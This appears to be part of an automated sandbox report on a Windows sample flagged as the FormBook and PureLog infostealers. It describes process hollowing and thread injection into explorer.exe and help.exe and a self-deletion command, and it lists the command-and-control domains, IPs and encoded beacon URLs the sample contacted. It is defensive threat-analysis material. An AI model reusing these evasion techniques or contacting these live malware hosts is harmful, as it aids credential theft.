                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6CA72 mov eax, dword ptr fs:[00000030h]2_2_01A6CA72
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6CA72 mov eax, dword ptr fs:[00000030h]2_2_01A6CA72
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00A5B mov eax, dword ptr fs:[00000030h]2_2_01A00A5B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00A5B mov eax, dword ptr fs:[00000030h]2_2_01A00A5B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4DAD mov eax, dword ptr fs:[00000030h]2_2_01AC4DAD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A26DA0 mov eax, dword ptr fs:[00000030h]2_2_01A26DA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8DAE mov eax, dword ptr fs:[00000030h]2_2_01AB8DAE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8DAE mov eax, dword ptr fs:[00000030h]2_2_01AB8DAE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CDB1 mov ecx, dword ptr fs:[00000030h]2_2_01A2CDB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CDB1 mov eax, dword ptr fs:[00000030h]2_2_01A2CDB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CDB1 mov eax, dword ptr fs:[00000030h]2_2_01A2CDB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeThread register set: target process: 4084Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 4084Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                Sample uses process hollowing technique
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 7C0000Jump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeProcess created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"Jump to behavior
                Source: explorer.exe, 00000003.00000000.1380877734.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2738994986.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1374882310.00000000044D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1372654230.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3825318823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3825318823.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000003.00000000.1380877734.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2738994986.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeQueries volume information: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Shared Modules                		1
                DLL Side-Loading                		412
                Process Injection                		1
                Rootkit                		1
                Credential API Hooking                		121
                Security Software Discovery                		Remote Services1
                Credential API Hooking                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Masquerading                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Disable or Modify Tools                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
                Virtualization/Sandbox Evasion                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script412
                Process Injection                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Deobfuscate/Decode Files or Information                		Cached Domain Credentials112
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410995 Sample: duGqHKp0OUXaX1D.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 33 www.beatricesswarthout.xyz 2->33 35 www.velvetgloveseasonings.store 2->35 37 11 other IPs or domains 2->37 39 Snort IDS alert for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 47 9 other signatures 2->47 11 duGqHKp0OUXaX1D.exe 3 2->11         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 55 Tries to detect virtualization through RDTSC time measurements 11->55 14 duGqHKp0OUXaX1D.exe 11->14         started        process6 signatures7 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Maps a DLL or memory area into another process 14->59 61 Sample uses process hollowing technique 14->61 63 Queues an APC in another process (thread injection) 14->63 17 explorer.exe 64 1 14->17 injected process8 dnsIp9 27 www.velvetgloveseasonings.store 216.40.34.41, 49716, 80 TUCOWSCA Canada 17->27 29 maxhealthunity.com 15.197.142.173, 49718, 80 TANDEMUS United States 17->29 31 6 other IPs or domains 17->31 20 help.exe 17->20         started        process10 signatures11 49 Modifies the context of a thread in another process (thread injection) 20->49 51 Maps a DLL or memory area into another process 20->51 53 Tries to detect virtualization through RDTSC time measurements 20->53 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                duGqHKp0OUXaX1D.exe63%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                duGqHKp0OUXaX1D.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://powerpoint.office.comer0%URL Reputationsafe
                http://www.microsoft.c0%URL Reputationsafe
                http://www.agathis.funReferer:0%Avira URL Cloudsafe
                http://www.maxhealthunity.com/ns03/0%Avira URL Cloudsafe
                http://www.velvetgloveseasonings.store/ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq0%Avira URL Cloudsafe
                http://www.velvetgloveseasonings.store/ns03/0%Avira URL Cloudsafe
                http://www.yedxec.xyz0%Avira URL Cloudsafe
                http://www.engagenotrage.com0%Avira URL Cloudsafe
                http://www.velvetgloveseasonings.storeReferer:0%Avira URL Cloudsafe
                http://www.beatricesswarthout.xyz0%Avira URL Cloudsafe
                http://www.grupooceanique.com0%Avira URL Cloudsafe
                http://www.yedxec.xyz/ns03/0%Avira URL Cloudsafe
                http://schemas.micro0%URL Reputationsafe
                http://www.grupooceanique.com/ns03/0%Avira URL Cloudsafe
                http://www.gildedbeautyaesthitics.com/ns03/www.maxhealthunity.com0%Avira URL Cloudsafe
                http://www.gildedbeautyaesthitics.comReferer:0%Avira URL Cloudsafe
                http://www.scheuermannworks.com0%Avira URL Cloudsafe
                http://www.leclandesparents.com0%Avira URL Cloudsafe
                http://www.gildedbeautyaesthitics.com0%Avira URL Cloudsafe
                http://www.gildedbeautyaesthitics.com/ns03/0%Avira URL Cloudsafe
                http://www.leclandesparents.com/ns03/www.yedxec.xyz0%Avira URL Cloudsafe
                http://www.maxhealthunity.com0%Avira URL Cloudsafe
                http://www.taiyuanbaoyang.com/ns03/www.beatricesswarthout.xyz0%Avira URL Cloudsafe
                http://www.velvetgloveseasonings.store/ns03/www.gildedbeautyaesthitics.com0%Avira URL Cloudsafe
                http://www.beatricesswarthout.xyzReferer:0%Avira URL Cloudsafe
                http://www.beatricesswarthout.xyz/ns03/www.engagenotrage.com0%Avira URL Cloudsafe
                http://www.elizabethsbookshelf.com0%Avira URL Cloudsafe
                http://www.maxhealthunity.comReferer:0%Avira URL Cloudsafe
                http://www.agathis.fun/ns03/0%Avira URL Cloudsafe
                http://www.maxhealthunity.com/ns03/www.fonbnk.pro0%Avira URL Cloudsafe
                http://www.elizabethsbookshelf.com/ns03/0%Avira URL Cloudsafe
                http://www.leclandesparents.comReferer:0%Avira URL Cloudsafe
                http://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n0%Avira URL Cloudsafe
                http://www.scheuermannworks.com/ns03/0%Avira URL Cloudsafe
                http://www.scheuermannworks.com/ns03/www.fichaphuman.net0%Avira URL Cloudsafe
                http://www.yedxec.xyz/ns03/www.chuanruhaomen.com0%Avira URL Cloudsafe
                http://www.yedxec.xyzReferer:0%Avira URL Cloudsafe
                http://www.engagenotrage.com/ns03/0%Avira URL Cloudsafe
                http://www.repair-services.todayReferer:0%Avira URL Cloudsafe
                http://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H0%Avira URL Cloudsafe
                http://www.repair-services.today0%Avira URL Cloudsafe
                http://www.leclandesparents.com/ns03/0%Avira URL Cloudsafe
                http://www.scheuermannworks.comReferer:0%Avira URL Cloudsafe
                http://www.fonbnk.pro/ns03/www.scheuermannworks.com0%Avira URL Cloudsafe
                http://www.scheuermannworks.com/ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB0%Avira URL Cloudsafe
                http://www.fichaphuman.netReferer:0%Avira URL Cloudsafe
                http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.com0%Avira URL Cloudsafe
                http://www.elizabethsbookshelf.comReferer:0%Avira URL Cloudsafe
                http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.store0%Avira URL Cloudsafe
                http://www.taiyuanbaoyang.comReferer:0%Avira URL Cloudsafe
                http://www.maxhealthunity.com/ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj0%Avira URL Cloudsafe
                www.grupooceanique.com/ns03/0%Avira URL Cloudsafe
                http://www.chuanruhaomen.com0%Avira URL Cloudsafe
                http://www.fonbnk.proReferer:0%Avira URL Cloudsafe
                http://www.grupooceanique.comReferer:0%Avira URL Cloudsafe
                http://www.grupooceanique.com/ns03/www.repair-services.today0%Avira URL Cloudsafe
                http://www.fichaphuman.net0%Avira URL Cloudsafe
                http://www.beatricesswarthout.xyz/ns03/0%Avira URL Cloudsafe
                http://www.agathis.fun/ns03/www.grupooceanique.com0%Avira URL Cloudsafe
                http://www.agathis.fun0%Avira URL Cloudsafe
                http://www.fichaphuman.net/ns03/0%Avira URL Cloudsafe
                http://www.chuanruhaomen.comReferer:0%Avira URL Cloudsafe
                http://www.agathis.fun/ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy30%Avira URL Cloudsafe
                http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.com0%Avira URL Cloudsafe
                http://www.repair-services.today/ns03/www.taiyuanbaoyang.com0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.scheuermannworks.com
                		208.91.197.27
                		truetrue
                  		unknown
                  gildedbeautyaesthitics.com
                  		192.0.78.25
                  		truetrue
                    		unknown
                    www.taiyuanbaoyang.com
                    		172.67.160.57
                    		truetrue
                      		unknown
                      www.beatricesswarthout.xyz
                      		172.67.171.253
                      		truetrue
                        		unknown
                        www.agathis.fun
                        		104.21.23.10
                        		truetrue
                          		unknown
                          www.repair-services.today
                          		172.67.146.200
                          		truetrue
                            		unknown
                            maxhealthunity.com
                            		15.197.142.173
                            		truetrue
                              		unknown
                              www.velvetgloveseasonings.store
                              		216.40.34.41
                              		truetrue
                                		unknown
                                www.grupooceanique.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.engagenotrage.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.gildedbeautyaesthitics.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.maxhealthunity.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.fonbnk.pro
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.velvetgloveseasonings.store/ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyqtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4ntrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48Htrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.scheuermannworks.com/ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEBtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.maxhealthunity.com/ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwjtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.grupooceanique.com/ns03/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.agathis.fun/ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://powerpoint.office.comerexplorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.agathis.funReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSA4explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.yedxec.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.velvetgloveseasonings.store/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.maxhealthunity.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.grupooceanique.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
